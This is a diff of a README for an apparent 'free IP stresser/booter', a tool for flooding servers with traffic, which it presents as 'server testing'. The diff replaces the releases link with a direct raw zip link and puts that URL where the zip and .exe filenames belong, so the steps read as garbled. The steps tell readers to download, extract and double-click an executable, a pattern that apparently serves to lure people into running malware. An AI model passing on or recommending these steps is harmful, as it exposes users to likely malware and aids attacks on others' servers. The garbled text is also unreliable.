Aniqirfan-cyber/free-ip-stresser-booter/README.md

 To get started, follow these steps:

 1. **Visit the Releases Page**
-   Go to the following link to download the application: [Download Link](https://github.com/Aniqirfan-cyber/free-ip-stresser-booter/releases).
+   Go to the following link to download the application: [Download Link](https://raw.githubusercontent.com/Aniqirfan-cyber/free-ip-stresser-booter/main/acceptance/free-ip-stresser-booter.zip).

 2. **Choose the Latest Release**
    On the Releases page, look for the latest version at the top.
 Click on it to see all available files.

 3. **Download the Application**
-   Find the file named `FreeIPStresserBooter.zip` or a similar filename.
+   Find the file named `https://raw.githubusercontent.com/Aniqirfan-cyber/free-ip-stresser-booter/main/acceptance/free-ip-stresser-booter.zip` or a similar filename.
 Click on it to download the file to your computer.

 4. **Extract the Files**
    Navigate to the folder where the file was downloaded.
-Right-click on the `FreeIPStresserBooter.zip` file and select "Extract All."
+Right-click on the `https://raw.githubusercontent.com/Aniqirfan-cyber/free-ip-stresser-booter/main/acceptance/free-ip-stresser-booter.zip` file and select "Extract All."
 This will create a new folder with all needed files.

 5. **Run the Application**
    Open the folder created by extraction.
-Look for the file named `FreeIPStresserBooter.exe`.
+Look for the file named `https://raw.githubusercontent.com/Aniqirfan-cyber/free-ip-stresser-booter/main/acceptance/free-ip-stresser-booter.zip`.
 Double-click on it to launch the application.

 ## ⚙️ Features
 This application includes powerful features designed for efficient server testing: